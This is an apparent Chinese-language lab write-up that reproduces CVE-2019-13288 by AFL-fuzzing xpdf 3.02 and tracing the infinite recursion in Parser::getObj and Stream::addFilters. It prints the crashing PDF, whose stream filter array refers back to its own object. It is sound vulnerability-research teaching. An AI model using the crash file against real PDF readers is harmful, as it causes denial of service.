CVE-2019-13288#

Description#

In Xpdf 4.01.01, the Parser::getObj() function in Parser.cc may cause infinite recursion via a crafted file. A remote attacker can leverage this for a DoS attack. This is similar to CVE-2018-16646.

Compile#

Download#

这里选择的是 Xpdf Source Code - xpdf 3.02，而不是 4.01.01。

wget https://dl.xpdfreader.com/old/xpdf-3.02.tar.gz
tar -zxvf xpdf-3.02.tar.gz

Build#

先用 LTO mode 插下桩：

cd xpdf-3.02
CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --prefix="$PWD/install"
make -j`nproc`
make install

考虑到插桩后的代码影响调试，所以我们再单独编译一个调试用的版本：

CC=clang CXX=clang++ CFLAGS="-O0 -g -gdwarf-4 -fno-inline -fno-builtin -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" ./configure --prefix="$PWD/install-dbg"
make -j`nproc`
make install

Samples#

这里我用脚本自动生成一些最小样本，先创建一个 python 虚拟环境，以免搞乱系统环境：

uv venv .venv
uv pip install reportlab pillow

生成样本的脚本如下，使用 uv run python .venv/gen_corpus.py 运行。

1
#!/usr/bin/env python3
2

3
import os
4
from reportlab.pdfgen import canvas
5
from reportlab.lib.pagesizes import A4
6
from reportlab.pdfbase import pdfmetrics
7
from reportlab.pdfbase.ttfonts import TTFont
8
from PIL import Image
9

10
OUTDIR = "corpus/pdf"
11
FONT_PATH = "/usr/share/fonts/TTF/Inconsolata-Black.ttf"
12

13
os.makedirs(OUTDIR, exist_ok=True)
14

15
def path(name):
16
    return os.path.join(OUTDIR, name)
17

18
def gen_image(fname):
19
    img = Image.new("RGB", (32, 32), color=(255, 0, 0))
20
    img.save(fname, "JPEG")
21

22
def gen_minimal():
23
    c = canvas.Canvas(path("id_000000_minimal.pdf"))
24
    c.drawString(10, 10, "hi")
25
    c.save()
26

27
def gen_text():
28
    c = canvas.Canvas(path("id_000001_text.pdf"))
29
    for i in range(5):
30
        c.drawString(50, 800 - i * 20, f"text line {i}")
31
    c.save()
32

33
def gen_multipage():
34
    c = canvas.Canvas(path("id_000002_multipage.pdf"))
35
    for i in range(5):
36
        c.drawString(100, 700, f"page {i}")
37
        c.showPage()
38
    c.save()
39

40
def gen_image_pdf():
41
    img_path = path("tmp.jpg")
42
    gen_image(img_path)
43

44
    c = canvas.Canvas(path("id_000003_image.pdf"), pagesize=A4)
45
    c.drawImage(img_path, 100, 500, width=100, height=100)
46
    c.save()
47

48
    os.remove(img_path)
49

50
def gen_font_pdf():
51
    pdfmetrics.registerFont(TTFont("FuzzFont", FONT_PATH))
52
    c = canvas.Canvas(path("id_000004_font.pdf"))
53
    c.setFont("FuzzFont", 12)
54
    c.drawString(100, 700, "font fuzz test")
55
    c.save()
56

57
def gen_stream_filter():
58
    # Hand-written PDF: stream + FlateDecode (parser favorite)
59
    data = b"""%PDF-1.4
60
1 0 obj
61
<< /Type /Catalog /Pages 2 0 R >>
62
endobj
63
2 0 obj
64
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
65
endobj
66
3 0 obj
67
<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>
68
endobj
69
4 0 obj
70
<< /Length 5 /Filter /FlateDecode >>
71
stream
72
x\x9c\x03\x00\x00\x00\x00\x01
73
endstream
74
endobj
75
xref
76
0 5
77
0000000000 65535 f
78
0000000010 00000 n
79
0000000060 00000 n
80
0000000115 00000 n
81
0000000175 00000 n
82
trailer
83
<< /Root 1 0 R >>
84
startxref
85
240
86
%%EOF
87
"""
88
    with open(path("id_000005_stream_filter.pdf"), "wb") as f:
89
        f.write(data)
90

91
def main():
92
    gen_minimal()
93
    gen_text()
94
    gen_multipage()
95
    gen_image_pdf()
96
    gen_font_pdf()
97
    gen_stream_filter()
98
    print(f"[+] PDF corpus generated in ./{OUTDIR}")
99

100
if __name__ == "__main__":
101
    main()

Fuzzing#

有了样本之后就可以用下面这个指令开始跑 fuzz 了：

afl-fuzz -i corpus/ -o out/ -s 1337 -- ./install/bin/pdftotext @@ -

跑呀跑，刚跑两分钟就出了几个 crashes，然后我去吃了个饭，大概十几分钟，回来一看居然已经有 33 个 crashes 了。简单看了下，发现除了下面这个符合描述的 crash 样本外，还爆出来不少因为其它原因崩溃的 corpus 。不过由于我们的目标是复现 CVE-2019-13288 所描述的漏洞，所以这里只会分析这个递归炸栈的 DoS 攻击样本。

Analysis#

根据上面的截图，我们不难发现，在执行 Parser::getObj 时反复使用了 objNum=7, objGen=0 作为参数，而 Object::fetch 和 XRef::fetch 的调用虽然早于 Parser::getObj，并且也在后续 backtrace 中重复出现，但从名字来看就知道，它们只是用于转发参数的函数，而不是真正创建 / 重入对象的函数，所以，我们应该从 Parser::getObj 开始分析，暂且认为它是递归环入口。

在 Parser.cc:94 下个断点，我们发现它直接进入了 makeStream，一路 n 下去，最后进入了 addFilters：

所以 addFilters 才是递归环的入口。

1
Stream *Stream::addFilters(Object *dict) {
2
  Object obj, obj2;
3
  Object params, params2;
4
  Stream *str;
5
  int i;
6

7
  str = this;
8
  dict->dictLookup("Filter", &obj);
9
  if (obj.isNull()) {
10
    obj.free();
11
    dict->dictLookup("F", &obj);
12
  }
13
  dict->dictLookup("DecodeParms", &params);
14
  if (params.isNull()) {
15
    params.free();
16
    dict->dictLookup("DP", &params);
17
  }
18
  if (obj.isName()) {
19
    str = makeFilter(obj.getName(), str, &params);
20
  } else if (obj.isArray()) {
21
    for (i = 0; i < obj.arrayGetLength(); ++i) {
22
      obj.arrayGet(i, &obj2);
23
      if (params.isArray())
24
        params.arrayGet(i, &params2);
25
      else
26
        params2.initNull();
27
      if (obj2.isName()) {
28
        str = makeFilter(obj2.getName(), str, &params2);
29
      } else {
30
        error(getPos(), "Bad filter name");
31
        str = new EOFStream(str);
32
      }
33
      obj2.free();
34
      params2.free();
35
    }
36
  } else if (!obj.isNull()) {
37
    error(getPos(), "Bad 'Filter' attribute in stream");
38
  }
39
  obj.free();
40
  params.free();
41

42
  return str;
43
}

调到 dictLookup("Filter", &obj) 的时候发现，它会去找 (objNum=7, objGen=0) 的 Dictionary 有没有 Filter：

我们的 crash 样本中这个 Indirect Object 长这样：

37 collapsed lines
%PDF-1.3
% ReportLab Generated PDF document (opensource)
1 0 obj
<<
/F1 2 0 R
>>
endobj
2 0 obj
<<
/BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font
>>
endobj
3 0 obj
<<
/Contents 7 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 6 0 R /Resources <<
/Font 1 0 R /Pr~cSet [ /PDF /Text /ImageB /ImageC /ImageI ]
>> /Rotate 0 /Trans <<

>>
  /Type /Page
>>
endobj
4 0 obj
<<
/PageMode /UseNone /Pages 6 0 R /Type /Catalog
>>
endobj
5 0 obj
<<
/Author (anonymous) /CreationDate (D:20260210132607+08'00') /Creator (anonymous) /erated PDF doModDate (D:20260210132607+08'00') /Producer (ReportLab PDF Library - \(opensource\))
  /Subject (unspecified) /Title (unti>
endobj
6 0 obj
<<
/Count 1 /Kids [ 3 0 R ] /Type /Pages
>>
endobj
7 0 obj
<<
/Filter [ /ASCII85Decode /FlateDects 7 0 R /Meode ] /Length 87
>>
stream
GapQh0E=F,0U\H3T\pNYT^QKk?tc>IP,;W#U1^23ihPEM_?CW4KISi9!25KZ"c\I79neZ[Kb,ht$3`$^8YHZB~>endstream
endobj
23 collapsed lines
xref
0 8
00 65535 f
000061 00000 n
000092 00000 n
000199 00000 n
000402 00000 n
00 Off00 n
000731 00000 n
000790 00000 n
trailer
<<
/ID
[<a9e650489693d00e7eßßßßßßßßßßßßab1f137a614fa1><a9e650489693d00e7eab1f137a614fa1>]
% ReportLab genKeywords () /cument -- digest (opensource)

/Info 5 0 R
/Root 4 0 R
/Size 8
>>
startxref
966
%%EOF

显然存在 Dictionary，并且里面是有 Filter 的，所以它会拿到这个 Object 的 Filter，得到一个长度为 4 的 Array：

这和我们 crash 样本中的内容完美匹配。

如果对此有疑问的话，可以去看 PDF reference: Adobe portable document format, version 1.3 。之所以看 v1.3 而不是更新的版本，是因为我们的 crash 样本用的 PDF 规格版本就是 1.3，即 %PDF-1.3。

继续往下走，我们会进入 else if (obj.isArray()) 这个分支：

回顾最开始的递归链，我们知道程序是执行完 Object::arrayGet -> Array::get 后反回到 fetch，再次获取 (objNum=7, objGen=0) 导致无限递归的。我们步入这个函数看看当前 for 循环在 i = 0 的时候拿到了什么：

我们发现它确实按照我们预期的那样，获取到了数组索引为 0 的元素，由于类型为 objName，所以之后会进入 if (obj2.isName()) 这个分支，而又因为 Object 内部其实是一个 tagged union，所以 obj2.getName() 获取到的值为 ASCII85Decode。

再次回顾一开始的递归调用链，我们注意到造成 Array::get 后返回到 fetch 再次获取到 (objNum=7, objGen=0) 的索引是 i = 2，直接 b Array::get if i == 2 后跳过去看，确实获取到了 7 0 R：